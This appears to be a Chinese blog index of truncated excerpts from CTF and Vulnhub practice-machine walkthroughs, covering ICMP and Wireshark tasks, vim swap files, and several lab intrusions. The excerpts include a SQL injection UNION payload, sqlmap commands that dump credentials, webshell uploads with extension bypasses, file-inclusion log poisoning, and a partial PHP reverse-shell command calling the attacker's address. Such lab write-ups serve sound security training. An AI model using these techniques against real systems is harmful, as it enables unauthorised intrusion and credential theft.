第七届全国残疾人职业技能大赛样题-网络安全-特殊后门
前言ICMP是Internet控制消息协议(Internet Control Message Protocol)的简称,它是TCP/IP协议族的一个子协议。ICMP协议主要用于在IP网络中传递控制信息。它提供了一种在IP网络中进行错误报告、网络拓扑探测和诊断等功能的机制。通常情况下,ICMP包是由网络设备(如路由器)生成并发送给主机或其他网络设备的。
ICMP协议主要有以下几种类型的消息:
Echo请求和Echo回应消息:用于网络测试和诊断,例如ping命令就是利用了Echo请求和Echo回应消息进行网络连通性测试。
目的不可达消息:当数据包无法到达目的地时,路由器会向源主机发送该消息,告知其无法到达目的地。
超时消息:当数据包在网络中被丢弃时,路由器会向源主机发送超时消息,告知其数据包在某个路由器上停留时间过长,已被丢弃。
重定向消息:告知主机将数据包发往另一个路由器,以优化数据包传输路径。
ICMP协议的作用非常重要,它可以帮助我们诊断网络故障,优化网络传输路径,保证网络的可靠性和稳定性。
一、特殊后门1.打开题目
2.解题打开流量包,输入flag搜索,可以看到大量I ...
第七届全国残疾人职业技能大赛样题-网络安全-黑客的数据流
前言Wireshark(前称Ethereal)是一个网络数据包分析软件。网络数据包分析软件的功能是截取网络数据包,并尽可能显示出最为详细的网络数据包数据。在过去,网络数据包分析软件是非常昂贵,或是专门属于营利用的软件,Wireshark的出现改变了这一切。在GNU通用公共许可证的保障范围底下,用户可以以免费的代价获取软件与其代码,并拥有针对其源代码修改及定制化的权利。Wireshark是目前全世界最广泛的网络数据包分析软件之一。
一、黑客的数据流1.打开题目
2.解题因为题目是http,预估是和表单有关,输入http.request.method eq "POST"过滤
在534下找到账号密码得到flag:1qaz2wsx
Vulnhub靶机 TOPHATSEC_FRESHLY
靶机介绍官方下载地址:http://www.vulnhub.com/entry/tophatsec-freshly,118/这个靶机需要在virtualbox导入,在VMware一直是导入失败
运行环境靶机:网络连接方式设为自动桥接,IP地址:192.168.1.87攻击机:通网段下的kali linux,IP地址:192.168.1.37开始渗透将靶机运行起来
获取IP地址
扫描端口
80端口访问80端口,是一张图片8080端口是一个链接,点击链接之后是wordpress站点使用工具扫描发现该站点确实存在wordpress漏洞进入wordpress的登录页面,使用弱密码无法登录
漏洞利用扫描一下80端口的目录,发现了一个登录页面和phpmyadmin数据库管理系统使用弱密码无法登录phpmyadmin在login.php页面 尝试使用万能密码登录,用户名输入’ or 1= – - 回显数字1 说明存在注入点,使用sqlmap跑一下可以注入成功在wordpress8080的users表当中找到了wordpress的用户名和密码sqlmap -u “http://192.168 ...
vim缓存文件
Catf1agCTF靶场web swp
题目链接:http://catf1ag.cn/
题目考点:vim在编辑文档的过程中如果异常退出,会产生缓存文件
vim 交换文件名
123参考文章:vim手册https://yianwillis.github.io/vimcdoc/doc/usr_11.html (中文)https://vimdoc.sourceforge.net/htmldoc/usr_11.html (英文)
在使用vim时会创建临时缓存文件,关闭vim时缓存文件则会被删除,当vim异常退出后,因为未处理缓存文件,导致可以通过缓存文件恢复原始文件内容
后缀是区分这些交换文件的方法同一个文件产生的多个交换文件的后缀是不一样的
以 index.php 为例:第一次产生的交换文件名为 .index.php.swp
再次意外退出后,将会产生名为 .index.php.swo 的交换文件
第三次产生的交换文件则为 .index.php.swn
以s 开头 第二位由 uvw 组成 第三位a-z
使用vim -r可以查看交换文件
使用 vim -r index.php可以恢 ...
vulnhub靶机 VULNOS_ 2
下载地址:https://www.vulnhub.com/entry/vulnos-2,147/
信息搜集获取IP地址
扫描端口
80端口点击website跳转到/jabc在 jabc/?q=node/7 页面看起来啥也没有,但是Ctrl+A全选之后看到提示还有一个目录 /jabcd0cs/访问/jabcd0cs/在/jabcd0cs/发现CMS的版本,使用searchsploit查询这里看到了pyload
1http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9
可以利用使用sqlmap跑库
1sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 --dbs
跑表名
12sq ...
vulnhub靶机 SickOs1.1
靶机介绍官方下载地址:https://www.vulnhub.com/entry/sickos-11,132/目标是获取root目录下的a0216ea4d51874464078c618298b1367.txt文件发布日期是2015年11月运行环境:靶机:网络连接方式设为自动桥接,IP地址:192.168.1.76攻击机:通网段下的kali linux,IP地址:192.168.1.44开始渗透运行靶机获取靶机IP地址扫描端口,没有发现熟悉的80端口使用nikto简单扫一下3128端口的目录看到有熟悉的robots.txt文件访问robots.txt文件的是发现无法访问,打开代理再进行访问发现一个目录,经过百度之后发现这是一个内容管理系统并且存在文件上传漏洞
123456Wolf CMS是一种内容管理系统,并且免费。其由PHP编码语言写成。Wolf CMS 0.8.2以及之前版本中存在文件上传漏洞。攻击者可以滥用上传特性来上传恶意的PHP文件到程序中,最终导致任意远程代码执行。漏洞具体存在于File Manager函数中,这个函数是一个接口,便于管理文件。在本例中,对于允许上传的文件类型 ...
vulnhub靶机 billu-b0x
靶机介绍官方下载地址:https://www.vulnhub.com/entry/billu-b0x,188/这个靶机没有flag,进入root目录就算完成,关于本地文件包含的运行环境:靶机:网络连接方式设为桥接,IP地址:192.168.124.25攻击机:通网段下的kali linux,IP地址:192.168.124.24开始渗透获取IP地址扫描端口扫描目录,使用多个工具一起扫,或者跟换字典扫描开始访问页面80端口首页是一个登录页面,提示我们SQL注入使用万能密码和sqlmap注入都没有注入成功,访问其他页面看一下add.php是一个文件上传的页面,但是不管上传什么文件页面都没有变化c.php是空白页面,源代码也是空白phpmy是phpmyadmin数据库管理工具,尝试使用弱密码登录 无法登录in.php是一个phpinfo页面test.php是一个文件包含的页面,提示少一个参数使用get传参提交参数没有反应使用post传参可以将包含文件下载到本地在c.php文件当中找到了数据库的用户名密码使用获取的用户名密码登录phpmyadmin登录成功之后在,ica_lab数据库的第 ...
vulnhub靶机 tomato
靶机介绍官方下载地址:http://www.vulnhub.com/entry/tomato-1,557/该靶机目标是获取root目录下的flag,难度是中等到困难运行环境:靶机:网络连接方式设为自动桥接,IP地址:192.168.1.86攻击机:通网段下的kali linux,IP地址:192.168.1.44开始渗透运行靶机获取IP地址扫描端口及其服务扫描目录开始访问80端口首页是一张图片,源代码也没有获取有用的信息server-status是一个目录antibot_image发现目录遍历漏洞在http://192.168.1.86/antibot_image/antibots/info.php的源代码当中发现了文件包含的命令使用文件包含,可以包含成功查看ssh服务的日志文件,在日志里面发现tomato用户尝试使用php代码作为用户名进行注入判断是否注入成功,加入参数执行发现执行成功既然php代码可以注入成功,就可以利用php来反弹shell开启监听,执行下面这条语句,需要进行url编码否则不会被解析源代码:php+-r+’$sock=fsockopen(“192.168 ...
vulnhub靶机 vulnuni1.0.1
靶机介绍官方下载地址:http://www.vulnhub.com/entry/vulnuni-101,439/靶机目标是获取root权限,获取用户的flag,难度是容易运行环境靶机:网络设为NAT模式,IP地址:192.168.174.139攻击机:同网段下的kali linux,IP地址:192.168.174.135开始渗透运行靶机获取靶机IP地址扫描端口只开放了一个80端口扫描目录爬取网站站点工具使用kali自带的ZAP开始访问获取的站点和目录80端口首页,和其他目录信息没有获取有用的信息vulnuni-eclass站点的首页是一个登录页面使用sqlmap跑一下,由于是POST传参,所以使用burp抓包将请求的参数写到一个txt文件当中注入确实存在SQL注入最终的sqlmap命令:sqlmap -r sqlmap.txt -D eclass -T user -C password,username –dump –batch使用获取的账号密码登录站点找到一个可以上传文件的页面尝试上传一句话木马,发现后缀为php的文件会被过滤成phps更改后缀进行绕过,将后缀改成2222绕过使用蚁 ...
vulnhub靶机 y0usef
靶机介绍官方下载地址:https://www.vulnhub.com/entry/y0usef-1,624/这个靶机难度较低,建议使用VirtualBox运行运行环境靶机:网络设为桥接,IP地址:192.168.1.88攻击机:同网段下的kali linux系统,IP地址为:192.168.1.37开始渗透运行靶机获取靶机IP地址扫描端口及其服务扫一下目录访问adminstration,提示说没有权限使用burp抓包看一下可以加上X-Forwarded-For,伪造本地登录是一个登录页面,使用弱密码登录登录成功看到有upload选项,是一个上传页面,上传反弹shell的php文件上传成功,开启监听,并访问shell.php监听成功,使用python打开一个终端再home目录下找到了user.txt有一段密文是base64加密,解密之后获取yousef用户的密码可以只用su直接切换到yousef用户可以按照提示使用ssh登录知道了yousef用户的密码就可以直接使用sudo提权到root切换到root目录查看flag这个靶机的渗透到这里就结束了!是不是很简单?
vulnhub靶机 zico2
靶机介绍官方下载地址:http://www.vulnhub.com/entry/zico2-1,210/目标是获取root的目录下的flag,难度是中级运行环境:靶机:网络设为NAT模式,IP地址为:192.168.174.133攻击机:同网段下的kali Linux,IP地址为:192.168.174.128运行靶机开始渗透获取IP地址扫描端口访问80端口,跳转到view.php URL里面有参数怀疑是SQL注入或者是文件包含使用工具扫描发现确实存在目录遍历的漏洞,并且已经给出了攻击细节成功包含passwd文件扫一下目录在dbadmin目录访问test_db.php发现是一个phpliteadmin管理系统,并且使用弱密码admin登录成功phpliteadmin <=1.9.3版本是存在远程php代码执行漏洞参考链接:https://www.exploit-db.com/exploits/24044创建一个cmd.php数据库在cmd.php数据库里面创建任意一张表内容写成一句话,由于对单引号做了过滤所以一句话里面不要加单引号返回view.php包含cmd.ph ...
vulnhub靶机 Acid
靶机介绍官方下载地址:http://www.vulnhub.com/entry/acid-server,125/这个靶机的目标是获取root目录的的flag,运行环境靶机:网络连接方式设为NAT,IP地址:192.168.174.134攻击机:同网段下的kali Linux系统,IP地址为:192.168.174.135开始渗透运行靶机获取靶机IP地址扫描端口及其服务看到只开启了33447端口,是web服务访问33447端口,在源代码中发现了0x643239334c6d70775a773d3d 16进制数编码解密之后时base64编码解码之后得到wow.jpg尝试访问,发现无法访问,可能是在其他目录下,扫描一下目录在images目录下访问wow.jpg,可以访问将图片下载到本地,使用编码工具打开,在最下面发现了ASCII码将ASCII转成Hex之后发现又是MD5加密的密文解密之后,是几位数字63425 怀疑是一个密码或者是ID看一下扫出来的其他目录文件,在Challenge目录下发现了好多文件,挨个访问一下index.php是一个登录页面,使用弱密码无法登录,也无法注入error ...